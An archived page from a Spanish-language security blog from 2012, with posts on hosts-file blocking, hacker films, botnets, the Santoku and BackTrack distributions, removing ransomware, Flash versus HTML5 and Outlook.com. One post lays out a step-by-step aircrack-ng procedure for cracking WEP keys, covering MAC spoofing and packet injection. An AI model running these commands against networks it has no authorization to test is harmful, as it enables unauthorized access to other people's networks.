Ads 468x60px

Image and video hosting by TinyPic

jueves, 30 de agosto de 2012

Archivo Hosts


Hola a todos!

El artículo de hoy va dirigido sobre todo a los padres, en la necesidad de saber que página frecuentan sus hijos o mejor dicho que páginas Web no quieren que visiten.
Como existe un porcentaje elevado en Internet de contenido pornográfico y violento este artículo bloqueara las Webs que por su contenido queramos que no estén accesibles a los mas pequeños de la casa.

Es cierto que existen hoy día muchas aplicaciones capaces de hacer esta labor pero nosotros lo haremos de forma artesanal. Vamos a ello:

1. Accedemos a la carpeta que contiene el archivo 'hosts'.
Que se encuentra en la siguiente ruta:
C:\WINDOWS\system32\drivers\etc

2. Abrimos el archivo con el bloc de notas.
Hacemos clic con el botón derecho sobre el archivo, seleccionamos Abrir con... y elegimos el Bloc de Notas.

3. Añadimos las Webs que queremos bloquear.
Debajo veremos un texto que dice 127.0.0.1 localhost, hay es donde debemos añadir las direcciones de las Webs que queremos bloquear. Ojo, para que todo salga correctamente se tiene que escribir 127.0.0.1 al principio de cada línea, seguido de un espacio que se hace con el con el tabulador y la dirección de la Web.

4. Guardamos los cambios
En la pestaña Archivo > Guardar.

Y listo ya tenemos esas Web bloqueadas.





Hasta la próxima, saludos.

lunes, 27 de agosto de 2012

Cine Hacker


Hola a tod@s

El hacker o pirata informático, para muchos un apasionado de la seguridad informática, para otros delincuentes, admirados por unos y odiados por otros.
Empresas que ven cada vez mas, ven como buena la opción de contratar a personal con conocimientos de seguridad informática, sin embargo otras ven una amenaza el tener moviéndose entre sus directorios a un hacker. 

Yo obviamente me inclino mas en la postura de que las empresas contraten cada vez mas a personal con conocimientos en seguridad, al igual que la sociedad no vean al hacker=delincuente.


Sea como fuera la cultura hacker siempre a despertado mucho interés tanto para lo bueno como en lo malo, instituciones, sociedad, empresas, gobiernos y hasta el cine ha llevado a las pantallas historias de hackers o introducido la temática en sus películas, a veces basándose en la teoría, es decir en la realidad y otras siendo pura ficción.

Hay van algunas de las películas que os quiero traer hoy sobre el tema hacker.


Hackers:

Comienza con un joven adolescente genio de los ordenadores, pero que aún no tiene mucha experiencia, entonces se rodea de otros hackers mas experimentados que el. Destapan una estafa empresarial. Destacar que como actriz podemos ver a Angelina Jolie.



Conspiración en la red: 
Otro chaval genio de la informática entra para trabajar en una gran corporación que le ofrece lujos propios de grande compañías. Pero descubre que algo va mal, algo no le cuadra y se da cuenta de que está siendo utilizado, utilizará sus conocimientos informáticos para conseguir salir del problema.


Pirates of Silicon Valley: 

Unas de mis preferidas porque es una película-documental y cuentan la historia de cómo dos jóvenes llamados Bill Gates y Steve Jobs hacen de la nada, dos de las más poderosas empresas del mundo. Creando dos imperios tecnológicos.

También la película entra un poco en sus personalidades y en lo vivían en esa época en un terreno mas personal.


Hasta la próxima, saludos.

jueves, 23 de agosto de 2012

Botnet


Hola a todos!

¿Qué son botnets?

Un botnet es una red de ordenadores infectados por código malicioso y son controlados por un atacante, estos pc´s trabajan conjuntamente para hacer maldades sin que el usuario infectado lo sepa claro. A estos pc´s también se les llama zombis.

El atacante tiene bien controlados en servidores a los pc´s infectados, imaginas una legión de zombis preparados para atacar, cuando este de la orden.
Algunas de las cosillas que pueden hacer son las siguientes:
  • Envío de spam
  • Realización de ataques de denegación de servicio distribuido (DDoS)
  • Alojamiento de archivos para sitios Web: material pornográfico, pedófilo, cracks, sitios de phishing.
  • Distribución e instalación de nuevo malware
  • Abuso de publicidad online

Dichas ordenes las puede realizar a través de comandos en IRC: canales de Chat, HTTP, P2P, también he oído que lo hacen ahora en redes sociales, lo desconozco cómo será.

¿Cómo saber si estoy infectado por una red botnet?


  • La comunicación es totalmente transparente al usuario infectado, pero un síntoma claro puede ser el gran consumo de recursos de nuestro sistema, con lo cual notaremos muy lento el pc, hasta casos en los que el usuario no podía hacer nada de nada.
  • Si se al abrir el navegador no se habré o va muy lento.
  • No se abre el antivirus o el firewall esta desactivado.
  • Las aplicaciones funcionan algo extrañas, como por ejemplo se cambian parámetros de la configuración.


Son a día de hoy de lo más utilizado por los atacantes para hacer de las suyas, porque les garantiza anonimato en la red y con un poder de X maquinas trabajando con una misión.

 Lo de siempre para no caer y convertirte en un zombi, pues tener un buen antivirus actualizado, firewall con unas buenas políticas restrictivas, no dejar pasar nada y después crear reglas explicitas, un poco de sentido común, y si sospecháis de un archivo escuchar una segunda opinión, por ejemplo de los sitios Web de escaneo de antivirus como virus total.  

Hasta la próxima, saludos.

miércoles, 22 de agosto de 2012

Santoku

Hola a todos!

Nueva distribución de Linux orientada a los dispositivos móviles y se centra en el análisis de malware y forense sobre estos. Su nombre Santoku, palabra “Santoku” es japonesa y significa cuchillo de cocina.
Esta distribución contiene herramientas libres y otras comerciales, como dije anteriormente con esta herramienta podremos analizar códigos en busca de malware y análisis forense en dispositivos móviles, en entre otras cosillas:

  • Herramientas para análisis forense (para adquirir y analizar datos)
  • Herramientas para realizar operaciones de flash sobre el firmware.
  • Herramientas obtener imágenes de tarjetas de memoria, memoria RAM, entre otros.
  • Scripts útiles y herramientas especialmente diseñadas para el análisis forense en dispositivos móviles.
  • Herramientas para el análisis de malware (para examinar malware en dispositivos móviles)
  • Emuladores de dispositivos móviles.
  • Herramientas de simulación de servicios de red para el análisis dinámico.
  • Herramienta de decompilación y desensamblado.
  • Acceso a bases de datos de malware.
  • Herramientas de seguridad para dispositivos móviles (evaluación de las aplicaciones)
  • Scripts para detectar problemas comunes en las aplicaciones.
  • Scripts para automatizar el descifrado de archivos, la enumeración de detalles de la aplicación, entre otras.





También destacar que incluye herramientas para realizar ingeniería reversa y test de penetración.
Con esta herramienta sobra decir que las auditorías son mucho mas sencillas, para terminar Santoku es una muy buena herramienta, ya que el malware se ha multiplicado en los últimos años en dispositivos móviles.

Hasta la próxima, saludos.

martes, 21 de agosto de 2012

Una Muerte Anunciada


Hola a todos!

Mike Chambers, una de las personas importantes en el desarrollo de Adobe ya lo anuncio a finales del año pasado, “la muerte de Flash en dispositivos móviles”.

Pero es que ahora meses después del comunicado queda en el aire si flash seguirá viéndose en la Web. HTML5 terminara con el. Hasta Steve Jobs anuncio la muerte de Flash.

Microsoft no contempla la idea de usar Flash en su interfaz metro. Y es que Flash merma el rendimiento de los ordenadores. Como decía anteriormente el responsable de que flash acabe es HTML5, Firefox y Opera lo soportan y Internet Explorer en su versión 9 lo incluye.
Los navegadores y por su puesto el gigante de los videos, Youtube ya está preparado para reproducir vídeos sin Flash.

Vamos a pasar argumentar el porque de HTML5. Sólo con decir que en HTML5 su nuevo estándar combina todas las tecnologías juntas HTML, CSS3 y JAVASCRIPT.
Eso significa que tenemos todas las tecnologías de desarrollo Web juntas.

HTML sigue siendo un lenguaje de etiquetas, cabe destacar los nuevos elementos como
SECTION, ARTICLE, ASIDE, HEADER, FOOTER, NAV, DIALOG, hasta dos nuevas etiquetas para insertar AUDIO y VIDEO tan sencillas como:

Etiqueta Audio
<audio src=”audio.mp3″ type=”audio/mp3″ controls autoplay />

La etiqueta AUDIO de HTML 5 permite los siguientes atributos:
autobuffer : permite la carga automática del archivo, y los valores posibles son “true” o “false

autoplay : reproduce automáticamente el audio
controls : muestra los controles de reproducción
height : define la altura del reproductor (en píxeles)
loop : ejecuta la reproducción en bucle, cuando finaliza vuelve a empezar
src : URL del archivo o fuente a reproducir
type : tipo de archivo o fuente (audio/mp3, video/ogg, video/mp4, …)
width : define el ancho del reproductor (en píxeles)


Etiqueta Vídeo
<video src=”video.ogg” controls autoplay />

Además se van a crear una serie de APIs que ayudarán a crear aplicaciones Web más complejas.

En definitiva chavales si queréis ir en la misma carrera que va la tecnología tenéis que poneros con HTM5 y dejar atrás Flash, porque aún hay por ahí muchas empresas de desarrollo que implementa en sus proyectos tecnologías obsoletas como flash.

Hasta la próxima, saludos.

viernes, 17 de agosto de 2012

BackTrack 5 r3

Hola todos!

Ahora que muchos van y vienen de vacaciones, la gente de Bactrack nos trae la nueva versión de este estupendo software de  “Penetration Testing Distribution”, para que no nos aburramos en estas largas tardes de calor.

Según cuentan, incluyen 60 nuevas herramientas que vienen recién salidas del horno, fueron lanzadas en el pasado BlackHat y la Defcon, una nueva categoría “explotación física”, que que ahora incluye herramientas tales como el IDE y las librerías de Arduino, o la colección de payloads de Kautilya Teensy.

Construir, probar y lanzar una nueva revisión de BackTrack no es nunca una tarea fácil. Mantenerse al día con las últimas herramientas, mientras que equilibrar sus requerimientos de las dependencias, se asemeja a un acto de magia, malabarismo espectáculo. Afortunadamente, los miembros activos de la comunidad Redmine como backtracklover JudasIscariot, hace que la tarea sea mucho más fácil activamente reportando errores y sugiriendo nuevas herramientas sobre una base regular.

Aquí tenéis los enlaces de descarga,

·  BT5R3-GNOME-64.torrent (md5: 8cd98b693ce542b671edecaed48ab06d)
·  BT5R3-GNOME-32.torrent (md5: aafff8ff5b71fdb6fccdded49a6541a0)
·  BT5R3-KDE-64.torrent (md5: 981b897b7fdf34fb1431ba84fe93249f)
·  BT5R3-KDE-32.torrent (md5: d324687fb891e695089745d461268576)
·  BT5R3-GNOME-32-VM.torrent (md5: bca6d3862c661b615a374d7ef61252c5)


Hasta la próxima, saludos.

miércoles, 15 de agosto de 2012

Virus Policía


Hola a todos!

Hoy vamos hablar sobre el llamado virus de la policía, este virus es de los llamados “virus secuestradores”  y esta “liando” en toda España, sobre todos al usuario de a pie, usuarios que no tienen grandes conocimientos de informática.
Este virus suele aparecer en algunas paginas de descargas y paginas con contenidos X, se presenta con aviso a pantalla completa con el logo de la policía nacional y exigiendo un pago a efectos de multa. Otro dato importante que tenéis que saber para los que todavía no os habéis topado con el es que os bloqueará el pc. No podréis hacer nada para salir de esa pantalla.



Una aplicación muy recomendable para la eliminación de este virus en concreto es la herramienta creada por los amigos de Infospyware, llamada polifix.
Los chicos de Infospyware nos explican como eliminarlo de forma muy sencilla.

1. Descarga PoliFix en una memoria USB desde otro PC
2. Inicia el PC infectado en Modo a prueba de errores
3. Conecta el pendrive en el ordenador
4. Ejecuta PoliFix desde el pendrive y espera



Este virus suplanta el archivo Explorer.exe con su propio fichero por eso sólo podemos ver el dichoso virus y nada mas, para evitar que vuelvas a infectarte abre el editor de registro regedit.exe, busca en el registro la siguiente ruta:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon

Una vez allí cambia la clave shell y cambia su valor por Explorer.exe


Hasta la próxima, saludos.

lunes, 13 de agosto de 2012

Auditar Wifi (seguridad wep)


Hola a todos!

Este artículo quizás sea muy fácil, nada novedoso, sobre todo para los más experimentados, pero, aunque no os lo creáis aún sigue habiendo mucho WEP por ahí…

Vamos haya, ahí bastantes distribuciones Linux para auditar redes inalámbricas, a mi me gusta mucho Bactrack, que se encuentra en su versión 5 R2.

WEP es el acrónimo de Wired Equivalent Privacy, en español Privacidad Equivalente ha Cableado, es un algoritmo muy débil porque utiliza el algoritmo de cifrado RC4.
Vamos a ver como en cinco minutos tenemos la clave de la red fácilmente.

Lo primero que deberíamos hacer es cambiarnos, que siempre recomiendo cuando hacemos “pruebas” es montarnos un laboratorio y para ello recomiendo correr siempre los live-CD y S.O en una maquina virtual. Una vez que tenemos el S.O en la maquina virtual abrimos la consola de comandos.

1º airmon-ng     (para poner la tarjeta en modo monitor.)

2º Es recomendable cambiar la Mac de nuestra maquina, para ello ponemos:
Macchanger-m 00:11:22:33:44:55, por ejemplo

airmon-ng start wlan0 (en el modo monitor queda renombrada la tarjeta como mon.)

airodump-ng mon0 (en este apartado ya vemos las redes disponibles.)

5º  (A continuación pulsamos control + C para parar el escaneo)

6º  airodump-ng mon0 --bssid mac de la red a escanear --channel nº canal –write demo
Ejemplo: ( airodump-ng mon0 --bssid 55:66:78:12:00:45  --channel 3 --write demo

7º (Si la red a auditor no esta emitiendo datas, es decir no esta generando tráfico de red, nunca vamos a generar suficientes datas para conseguir la key, pues tendréis que inyectar tráfico, vamos a ello.)

Aireplay-ng el canal de la red mon0 –b mac de la red a auditor  -h station
Aireplay-ng -3 mon0 –b 55:66:78:12:00:45 –h 33:44:55:78:00:78

8º (Si ya hemos generado suficientes datas proseguimos.)
ls
aircrack-ng demo-01.cap

Y premio! nos pondrá un mensaje de “KEY FOUND” nos dará la clave en texto plano.

No deberíais tardar más de diez minutos.


Hasta la próxima, saludos.

lunes, 6 de agosto de 2012

Cambio de Hotmail

Hola a tod@s

Gran transformación que Microsoft está realizando, tras el éxito de las redes sociales y el intentar crear su propia red social sin éxito alguno, Microsoft, o mas bien Messenger su aplicación de mensajería instantánea parecía una playa desierta, no entraba ni "el tato". Por ello en Microsoft realmente están interesados en hacer mejores cosas: Hotmail deja de existir para convertirse en Outlook una aplicación Web para leer tus correos con estilo Metro (la interfaz de Windows Phone 7 y Windows 8) con Skype integrado.

Además Microsoft planea poco a poco retirar el dominio Hotmail de la Web, que estos días es sinónimo de estar desastualizado. Cualquier usuario puede optar por una dirección @outlook.com y accederla vía Web, Exchange ActiveSync y POP3.

La integración con Skype aún no está lista pero lo estará en las próximas semanas. Pero como es habitual de las marcas grandes, Microsoft está intentando integrar todas sus propiedades y crear su propio ecosistema. Skydrive (incluyendo fotos, documentos), Windows Live Messenger, etcétera.
Outlook.com también tiene una característica llamada Quick View por medio del cual te da acceso a vista previa de documentos (Excel, Word, PowerPoint), vídeos de YouTube, e incluso mostrar acceso a contactos en Facebook y Twitter dependiendo del contenido del mensaje.
Outlook.com ya está en funcionamiento, si tienes una cuenta de Hotmail puedes acceder y probarlo. Una buena decisión de Microsoft por renovarse.



Hasta la próxima, saludos.


viernes, 3 de agosto de 2012

Related Posts Plugin for WordPress, Blogger...
 

X1RED+SEGURA

Spy Block

COLABORA

 
cookie script